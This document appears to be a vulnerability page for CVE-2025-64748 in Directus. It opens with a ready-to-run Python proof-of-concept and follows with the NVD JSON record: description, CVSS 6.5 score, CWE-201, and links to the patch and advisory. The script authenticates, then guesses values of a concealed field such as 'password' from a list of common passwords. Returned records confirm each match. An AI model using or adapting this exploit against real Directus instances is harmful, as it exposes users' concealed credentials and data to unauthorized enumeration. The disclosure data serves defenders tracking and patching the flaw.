CVE-2025-64748

import requests import json # CVE-2025-64748 PoC - Directus Sensitive Field Enumeration # Target: Directus < 11.13.0 # Attack: Enumerate sensitive fields through search functionality TARGET_URL = "http://target-directus-instance.com" USERNAME = "attacker" PASSWORD = "password123" SENSITIVE_FIELD = "password" # or other concealed field def authenticate(): """Authenticate and get access token""" endpoint = f"{TARGET_URL}/auth/login" data = { "email": USERNAME, "password": PASSWORD } response = requests.post(endpoint, json=data) if response.status_code == 200: return response.json().get("data", {}).get("access_token") return None def enumerate_sensitive_field(token, field_name, wordlist): """Enumerate sensitive field values through search""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Try each value from wordlist for value in wordlist: # Search for records where field matches the value payload = { "filter": { "_and": [ { field_name: { "_eq": value } } ] } } response = requests.post( f"{TARGET_URL}/items/your_collection", headers=headers, json=payload ) if response.status_code == 200: result = response.json() # If records are returned, the value matched if result.get("data") and len(result["data"]) > 0: print(f"[+] Found match: {field_name} = {value}") # Note: The actual value will be masked as **** # But existence of record confirms the guess # Example wordlist for enumeration common_passwords = ["admin", "password", "123456", "admin123", "password123"] token = authenticate() if token: enumerate_sensitive_field(token, SENSITIVE_FIELD, common_passwords)

{"cve": {"id": "CVE-2025-64748", "sourceIdentifier": "[email protected]", "published": "2025-11-13T22:15:52.183", "lastModified": "2025-12-08T15:00:53.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. A vulnerability in versions prior to 11.13.0 allows authenticated users to search concealed/sensitive fields when they have read permissions. While actual values remain masked (`****`), successful matches can be detected through returned records, enabling enumeration attacks on sensitive data. Version 11.13.0 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.13.0", "matchCriteriaId": "19DDC40E-F676-4824-A433-37CFBEDFEBDB"}]}]}], "references": [{"url": "https://github.com/directus/directus/commit/7737d56e096f95edfbdf861a3c08999ad31ce204", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/directus/directus/security/advisories/GHSA-8jpw-gpr4-8cmh", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}